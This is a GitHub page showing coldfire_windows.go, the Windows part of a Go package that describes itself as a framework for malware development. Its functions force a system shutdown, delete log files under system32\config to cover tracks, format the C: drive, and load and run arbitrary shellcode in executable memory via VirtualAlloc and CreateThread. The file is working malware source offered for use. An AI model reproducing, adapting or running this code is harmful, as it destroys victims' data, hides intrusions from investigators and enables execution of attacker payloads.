-
Notifications
You must be signed in to change notification settings - Fork 142
/
coldfire_windows.go
55 lines (47 loc) · 1.21 KB
/
coldfire_windows.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
// Package coldfire is a framework that provides functions
// for malware development that are mostly compatible with
// Linux and Windows operating systems.
package coldfire
import (
"os"
"syscall"
"unsafe"
)
func shutdown() error {
c := "shutdown -s -t 60"
_, err := cmdOut(c)
return err
}
func clearLogs() error {
os.Chdir("%windir%\\system32\\config")
_, err := cmdOut("del *log /a /s /q /f")
if err != nil {
return err
}
return nil
}
func wipe() error {
cmd := "format c: /fs:ntfs"
_, err := cmdOut(cmd)
if err != nil {
return err
}
return nil
}
func runShellcode(sc []byte, bg bool) {
var bg_run uintptr = 0x00
if bg {
bg_run = 0x00000004
}
kernel32 := syscall.MustLoadDLL("kernel32.dll")
VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
procCreateThread := kernel32.MustFindProc("CreateThread")
waitForSingleObject := kernel32.MustFindProc("WaitForSingleObject")
addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x2000|0x1000, syscall.PAGE_EXECUTE_READWRITE)
ptr := (*[990000]byte)(unsafe.Pointer(addr))
for i, value := range sc {
ptr[i] = value
}
threadHandle, _, _ := procCreateThread.Call(0, 0, addr, 0, bg_run, 0)
waitForSingleObject.Call(threadHandle, uintptr(^uint(0)))
}